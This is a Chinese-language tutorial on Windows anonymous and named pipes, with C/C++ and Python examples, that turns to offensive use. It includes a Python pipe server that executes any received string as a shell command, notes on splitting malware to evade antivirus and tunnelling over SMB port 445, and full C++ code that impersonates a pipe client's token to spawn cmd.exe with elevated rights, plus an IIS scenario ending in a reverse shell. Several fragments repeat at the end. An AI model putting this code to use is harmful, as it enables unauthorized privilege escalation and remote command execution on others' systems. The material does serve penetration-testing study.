Windows管道(Pipe)利用完全指南<\/h1>

管道基础概念<\/h2>
管道(Pipe)是Windows操作系统中进程间通信(IPC)的重要机制，允许数据在两个进程之间传输。管道分为两种主要类型：<\/p>

1. 匿名管道(Anonymous Pipe)<\/h3>

特点<\/strong>：<\/p>

单向通信：数据只能单向流动（从一个进程的输出流到另一个进程的输入流）<\/li>
进程关系：通常用于父子进程之间的通信<\/li>
使用限制：只能在同一台计算机上使用，不能用于网络通信<\/li> <\/ul>
典型用例<\/strong>：<\/p>

父进程创建匿名管道，并将其句柄传递给子进程，允许父子进程共享数据<\/li>
使用匿名管道从子进程中捕获输出（如命令行工具输出）<\/li> <\/ul>
C\/C++创建示例<\/strong>：<\/p>
HANDLE hReadPipe, hWritePipe; <\/span><\/span>SECURITY_ATTRIBUTES sa =<\/span> { sizeof<\/span>(SECURITY_ATTRIBUTES), NULL, TRUE }; <\/span><\/span>if<\/span> (CreatePipe(&<\/span>hReadPipe, &<\/span>hWritePipe, &<\/span>sa, 0<\/span>)) { <\/span><\/span> \/\/ 使用管道进行数据通信 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 命名管道(Named Pipe)<\/h3> 特点<\/strong>：<\/p> 双向通信：支持双向或单向通信<\/li> 进程关系：可以在不同的进程间通信，甚至可以跨网络通信（同一网络中的不同主机）<\/li> 命名机制：每个命名管道都有一个唯一的名称，客户端可以通过名称访问它<\/li> 并发支持：同一个管道可以同时被多个客户端连接<\/li> <\/ul> 典型用例<\/strong>：<\/p> 用于客户端与服务器之间的通信<\/li> 网络通信：允许应用程序跨计算机传输数据<\/li> 实现复杂的进程间通信<\/li> <\/ul> C\/C++创建示例<\/strong>：<\/p> HANDLE hPipe =<\/span> CreateNamedPipe( <\/span><\/span> TEXT("<\/span>\\\\<\/span>.<\/span>\\<\/span>pipe<\/span>\\<\/span>MyPipe"<\/span>), \/\/ 管道名 <\/span><\/span><\/span><\/span> PIPE_ACCESS_DUPLEX, \/\/ 双向读写 <\/span><\/span><\/span><\/span> PIPE_TYPE_MESSAGE |<\/span> PIPE_READMODE_MESSAGE |<\/span> PIPE_WAIT, \/\/ 消息模式 <\/span><\/span><\/span><\/span> PIPE_UNLIMITED_INSTANCES, \/\/ 最大实例数 <\/span><\/span><\/span><\/span> 512<\/span>, 512<\/span>, \/\/ 输出和输入缓冲区大小 <\/span><\/span><\/span><\/span> 0<\/span>, \/\/ 默认超时时间 <\/span><\/span><\/span><\/span> NULL \/\/ 安全属性 <\/span><\/span><\/span><\/span>); <\/span><\/span>if<\/span> (hPipe !=<\/span> INVALID_HANDLE_VALUE) { <\/span><\/span> \/\/ 等待客户端连接 <\/span><\/span><\/span><\/span> ConnectNamedPipe(hPipe, NULL); <\/span><\/span> \/\/ 进行数据读写 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>客户端连接示例<\/strong>：<\/p> HANDLE hPipe =<\/span> CreateFile( <\/span><\/span> TEXT("<\/span>\\\\<\/span>.<\/span>\\<\/span>pipe<\/span>\\<\/span>MyPipe"<\/span>), \/\/ 管道名 <\/span><\/span><\/span><\/span> GENERIC_READ |<\/span> GENERIC_WRITE, \/\/ 读写权限 <\/span><\/span><\/span><\/span> 0<\/span>, \/\/ 不共享 <\/span><\/span><\/span><\/span> NULL, \/\/ 默认安全属性 <\/span><\/span><\/span><\/span> OPEN_EXISTING, \/\/ 打开现有管道 <\/span><\/span><\/span><\/span> 0<\/span>, \/\/ 默认属性 <\/span><\/span><\/span><\/span> NULL \/\/ 无模板文件 <\/span><\/span><\/span><\/span>); <\/span><\/span><\/code><\/pre>Python实现管道通信<\/h2> 服务端代码<\/h3> import<\/span> subprocess <\/span><\/span>import<\/span> win32pipe <\/span><\/span>import<\/span> win32file <\/span><\/span> <\/span><\/span>PIPE_NAME =<\/span> r<\/span>"<\/span>\\<\/span>.\pipe\MyPipe"<\/span> <\/span><\/span> <\/span><\/span>def<\/span> command_execute<\/span>(command): <\/span><\/span> """执行命令并返回输出"""<\/span> <\/span><\/span> try<\/span>: <\/span><\/span> result =<\/span> subprocess.<\/span>run(command, shell=<\/span>True<\/span>, capture_output=<\/span>True<\/span>, text=<\/span>True<\/span>) <\/span><\/span> return<\/span> result.<\/span>stdout +<\/span> result.<\/span>stderr <\/span><\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> return<\/span> f<\/span>"Error executing command: <\/span>{<\/span>str(e)}<\/span>"<\/span> <\/span><\/span> <\/span><\/span>def<\/span> start_pipe_server<\/span>(): <\/span><\/span> print(f<\/span>"Starting server at pipe: <\/span>{<\/span>PIPE_NAME}<\/span>"<\/span>) <\/span><\/span> # 创建命名管道<\/span> <\/span><\/span> pipe =<\/span> win32pipe.<\/span>CreateNamedPipe( <\/span><\/span> PIPE_NAME, <\/span><\/span> win32pipe.<\/span>PIPE_ACCESS_DUPLEX, # 双向通信<\/span> <\/span><\/span> win32pipe.<\/span>PIPE_TYPE_MESSAGE |<\/span> win32pipe.<\/span>PIPE_WAIT, <\/span><\/span> 1<\/span>, # 最大连接数<\/span> <\/span><\/span> 65536<\/span>, # 输出缓冲区大小<\/span> <\/span><\/span> 65536<\/span>, # 输入缓冲区大小<\/span> <\/span><\/span> 0<\/span>, <\/span><\/span> None<\/span>) <\/span><\/span> <\/span><\/span> print("Waiting for client connection..."<\/span>) <\/span><\/span> # 等待客户端连接<\/span> <\/span><\/span> win32pipe.<\/span>ConnectNamedPipe(pipe, None<\/span>) <\/span><\/span> print("Client connected!"<\/span>) <\/span><\/span> <\/span><\/span> while<\/span> True<\/span>: <\/span><\/span> try<\/span>: <\/span><\/span> print("Waiting for a message..."<\/span>) <\/span><\/span> # 读取客户端发送的数据<\/span> <\/span><\/span> result, message =<\/span> win32file.<\/span>ReadFile(pipe, 4096<\/span>) <\/span><\/span> print(f<\/span>"Received message: <\/span>{<\/span>message.<\/span>decode('utf-8'<\/span>)}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span> if<\/span> message.<\/span>decode('utf-8'<\/span>).<\/span>strip().<\/span>lower() ==<\/span> "exit"<\/span>: <\/span><\/span> print("Exit command received. Closing server."<\/span>) <\/span><\/span> break<\/span> <\/span><\/span> <\/span><\/span> # 回复客户端<\/span> <\/span><\/span> output =<\/span> command_execute(message.<\/span>decode('utf-8'<\/span>).<\/span>strip()) <\/span><\/span> win32file.<\/span>WriteFile(pipe, output.<\/span>encode('utf-8'<\/span>)) # 返回结果<\/span> <\/span><\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> return<\/span> f<\/span>"Client auto close: <\/span>{<\/span>str(e)}<\/span>"<\/span> <\/span><\/span> <\/span><\/span> # 关闭管道<\/span> <\/span><\/span> win32file.<\/span>CloseHandle(pipe) <\/span><\/span> print("Pipe closed."<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> start_pipe_server() <\/span><\/span><\/code><\/pre>客户端代码<\/h3> import<\/span> win32file <\/span><\/span>import<\/span> win32pipe <\/span><\/span> <\/span><\/span>PIPE_NAME =<\/span> r<\/span>"<\/span>\\<\/span>.\pipe\MyPipe"<\/span> <\/span><\/span> <\/span><\/span>def<\/span> connect_to_pipe<\/span>(): <\/span><\/span> print(f<\/span>"Connecting to pipe: <\/span>{<\/span>PIPE_NAME}<\/span>"<\/span>) <\/span><\/span> # 连接到命名管道<\/span> <\/span><\/span> handle =<\/span> win32file.<\/span>CreateFile( <\/span><\/span> PIPE_NAME, <\/span><\/span> win32file.<\/span>GENERIC_READ |<\/span> win32file.<\/span>GENERIC_WRITE, <\/span><\/span> 0<\/span>, <\/span><\/span> None<\/span>, <\/span><\/span> win32file.<\/span>OPEN_EXISTING, <\/span><\/span> 0<\/span>, <\/span><\/span> None<\/span> <\/span><\/span> ) <\/span><\/span> print("Connected to server."<\/span>) <\/span><\/span> return<\/span> handle <\/span><\/span> <\/span><\/span>def<\/span> send_message<\/span>(pipe_handle, message): <\/span><\/span> print(f<\/span>"Sending message: <\/span>{<\/span>message}<\/span>"<\/span>) <\/span><\/span> win32file.<\/span>WriteFile(pipe_handle, message.<\/span>encode('utf-8'<\/span>)) <\/span><\/span> # 读取服务端的回复<\/span> <\/span><\/span> result, response =<\/span> win32file.<\/span>ReadFile(pipe_handle, 4096<\/span>) <\/span><\/span> print(f<\/span>"Server response: <\/span>{<\/span>response.<\/span>decode('utf-8'<\/span>)}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> pipe =<\/span> connect_to_pipe() <\/span><\/span> # 发送测试消息<\/span> <\/span><\/span> send_message(pipe, "calc"<\/span>) <\/span><\/span> send_message(pipe, "exit"<\/span>) # 发送退出命令<\/span> <\/span><\/span> # 关闭管道<\/span> <\/span><\/span> win32file.<\/span>CloseHandle(pipe) <\/span><\/span> print("Client disconnected."<\/span>) <\/span><\/span><\/code><\/pre>管道在安全领域的应用<\/h2> 1. 分离免杀技术<\/h3> 管道通信可以用于实现恶意代码的分离执行，绕过安全软件的检测。其编程代码风格类似于socks代理的实现方式，都是创建、监听、接收、返回、关闭的基本流程。<\/p> 2. 绕过防火墙限制<\/h3> 远程命名管道使用SMB协议(Server Message Block)进行跨主机通信：<\/p> SMB默认工作端口：TCP 445（现代SMB协议）或TCP 139（较旧版本）<\/li> 在防火墙限制很多端口时，可以选择445端口，因为大部分Windows系统的445端口默认放行<\/li> <\/ul> 准备工作<\/strong>：<\/p> 确保SMB服务已在两台主机上启用（启用文件和打印机共享）<\/li> 确保防火墙允许访问TCP 445端口<\/li> 确保在两台主机之间建立了网络连接，并有适当的访问权限<\/li> 可以配置命名管道的安全描述符(Security Descriptor)增强安全性<\/li> 必须先将IPC$进行net use绑定才能使用远程管道<\/li> <\/ol> 3. Metasploit的getsystem原理<\/h3> 基本原理<\/strong>：<\/p> 命名管道是Windows系统进程间通信的一种方式，支持跨网络的通信<\/li> 当高权限客户端(如SYSTEM)连接到攻击者创建的命名管道时，攻击者通过ImpersonateNamedPipeClient冒充该客户端的安全上下文，从而获得与客户端相同的权限<\/li> <\/ul> 攻击流程<\/strong>：<\/p> 创建命名管道：使用CreateNamedPipe函数<\/li> 等待客户端连接：使用ConnectNamedPipe等待目标系统中的高权限进程连接<\/li> 调用冒充函数：使用ImpersonateNamedPipeClient函数切换当前线程的安全上下文<\/li> 提权操作：利用获得的高权限执行提权操作（如创建进程、修改文件等）<\/li> <\/ol> C++实现示例<\/strong>：<\/p> #include<\/span><stdio.h><\/span> <\/span><\/span><\/span>#include<\/span><windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> HANDLE hPipe =<\/span> NULL; <\/span><\/span> HANDLE tokenHandle =<\/span> NULL; <\/span><\/span> HANDLE newtokenHandle =<\/span> NULL; <\/span><\/span> STARTUPINFO startupInfo; <\/span><\/span> startupInfo.cb =<\/span> sizeof<\/span>(STARTUPINFO); <\/span><\/span> PROCESS_INFORMATION processInformation; <\/span><\/span> wchar_t recv_buf[1024<\/span>] =<\/span> {0<\/span>}; <\/span><\/span> <\/span><\/span> ZeroMemory(&<\/span>startupInfo, sizeof<\/span>(STARTUPINFO)); <\/span><\/span> ZeroMemory(&<\/span>processInformation, sizeof<\/span>(PROCESS_INFORMATION)); <\/span><\/span> <\/span><\/span> hPipe =<\/span> CreateNamedPipe(L<\/span>"<\/span>\\\\<\/span>.<\/span>\\<\/span>pipe<\/span>\\<\/span>myServerPipe"<\/span>, <\/span><\/span> PIPE_ACCESS_DUPLEX, <\/span><\/span> PIPE_READMODE_BYTE |<\/span> PIPE_WAIT, <\/span><\/span> PIPE_UNLIMITED_INSTANCES, <\/span><\/span> 1024<\/span>, <\/span><\/span> 1024<\/span>, <\/span><\/span> 0<\/span>, <\/span><\/span> NULL); <\/span><\/span> <\/span><\/span> if<\/span> (hPipe ==<\/span> INVALID_HANDLE_VALUE) { <\/span><\/span> printf("CreatePipe Failed"<\/span>); <\/span><\/span> CloseHandle(hPipe); <\/span><\/span> } <\/span><\/span> printf("[+] CreateNamedPipe Successfully<\/span>\n<\/span>"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 服务端在这里会进行堵塞，等待客户端进行连接 <\/span><\/span><\/span><\/span> if<\/span> (ConnectNamedPipe(hPipe, NULL)) { <\/span><\/span> printf("[+] ConnectNamedPipe Successfully<\/span>\n<\/span>"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 用于使调用线程模仿通过命名管道连接的客户端的安全上下文 <\/span><\/span><\/span><\/span> if<\/span> (ImpersonateNamedPipeClient(hPipe) ==<\/span> 0<\/span>) { <\/span><\/span> printf("[!] Error impersonating client %d<\/span>\n<\/span>"<\/span>, GetLastError()); <\/span><\/span> CloseHandle(hPipe); <\/span><\/span> return<\/span> -<\/span>1<\/span>; <\/span><\/span> } <\/span><\/span> printf("[+] ImpersonateNamedPipeClient Successfully<\/span>\n<\/span>"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 用于打开与当前线程相关联的访问令牌 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &<\/span>tokenHandle)) { <\/span><\/span> printf("[!] Error opening thread token %d<\/span>\n<\/span>"<\/span>, GetLastError()); <\/span><\/span> CloseHandle(hPipe); <\/span><\/span> return<\/span> -<\/span>1<\/span>; <\/span><\/span> } <\/span><\/span> printf("[+] OpenThreadToken Successfully<\/span>\n<\/span>"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 复制现有的访问令牌，并允许对新令牌进行定制化处理 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &<\/span>newtokenHandle)) { <\/span><\/span> printf("[!] Error duplicating thread token %d<\/span>\n<\/span>"<\/span>, GetLastError()); <\/span><\/span> CloseHandle(hPipe); <\/span><\/span> return<\/span> -<\/span>1<\/span>; <\/span><\/span> } <\/span><\/span> printf("[+] DuplicateTokenEx Successfully<\/span>\n<\/span>"<\/span>); <\/span><\/span> <\/span><\/span> wchar_t cmdPath[MAX_PATH] =<\/span> L<\/span>"c:<\/span>\\<\/span>windows<\/span>\\<\/span>system32<\/span>\\<\/span>cmd.exe"<\/span>; <\/span><\/span> \/\/ 在具有特定身份验证的情况下启动一个新进程 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>CreateProcessWithTokenW(newtokenHandle, LOGON_NETCREDENTIALS_ONLY, NULL, cmdPath, NULL, NULL, NULL, (LPSTARTUPINFOW)&<\/span>startupInfo, &<\/span>processInformation)) { <\/span><\/span> printf("[!] CreateProcessWithTokenW Failed (%d).<\/span>\n<\/span>"<\/span>, GetLastError()); <\/span><\/span> CloseHandle(hPipe); <\/span><\/span> return<\/span> -<\/span>1<\/span>; <\/span><\/span> } <\/span><\/span> printf("[+] CreateProcessWithTokenW Successfully<\/span>\n<\/span>"<\/span>); <\/span><\/span> CloseHandle(hPipe); <\/span><\/span> } <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>4. 实际提权场景示例<\/h3> 场景描述<\/strong>：<\/p> 面对一个使用Windows集成身份验证的dotnet Web应用程序<\/li> 可以使用弱本地密码访问Admin后端<\/li> 在管理面板中可以指定记录用户活动的日志文件<\/li> 从管理面板可以获取RCE（如上传.aspx文件）<\/li> Web服务器在标准IIS AppPool用户下运行，默认具有SeImpersonate权限<\/li> <\/ol> 提权步骤<\/strong>：<\/p> 为Logfile指定命名管道（\.\pipe\logfile）<\/li> 获取IIS AppPoolUser的shell，创建命名管道并等待连接<\/li> 模拟写入Logfile的经过身份验证的用户<\/li> 如果是高权限用户，使用其令牌启动反向shell<\/li> <\/ol> 关键API函数详解<\/h2> CreateNamedPipe<\/strong> - 创建命名管道<\/li> ConnectNamedPipe<\/strong> - 等待客户端连接<\/li> ImpersonateNamedPipeClient<\/strong> - 冒充管道客户端的安全上下文<\/li> OpenThreadToken<\/strong> - 打开与当前线程相关联的访问令牌<\/li> DuplicateTokenEx<\/strong> - 复制现有的访问令牌<\/li> CreateProcessWithTokenW<\/strong> - 使用特定令牌创建新进程<\/li> <\/ol> 安全注意事项<\/h2> 管道通信应配置适当的安全描述符，限制访问权限<\/li> 在实现提权操作时，应考虑最小权限原则<\/li> 远程管道通信应加密敏感数据，防止中间人攻击<\/li> 生产环境中应谨慎使用管道通信，避免被恶意利用<\/li> <\/ol> 通过深入理解和掌握Windows管道技术，可以在合法渗透测试、系统管理和安全研究中发挥重要作用。<\/p>

Windows管道(Pipe)利用完全指南<\/h1>

管道基础概念<\/h2> 管道(Pipe)是Windows操作系统中进程间通信(IPC)的重要机制，允许数据在两个进程之间传输。管道分为两种主要类型：<\/p>

Python实现管道通信<\/h2>

管道在安全领域的应用<\/h2>

1. 分离免杀技术<\/h3> 管道通信可以用于实现恶意代码的分离执行，绕过安全软件的检测。其编程代码风格类似于socks代理的实现方式，都是创建、监听、接收、返回、关闭的基本流程。<\/p>

管道基础概念<\/h2>
管道(Pipe)是Windows操作系统中进程间通信(IPC)的重要机制，允许数据在两个进程之间传输。管道分为两种主要类型：<\/p>

1. 分离免杀技术<\/h3>
管道通信可以用于实现恶意代码的分离执行，绕过安全软件的检测。其编程代码风格类似于socks代理的实现方式，都是创建、监听、接收、返回、关闭的基本流程。<\/p>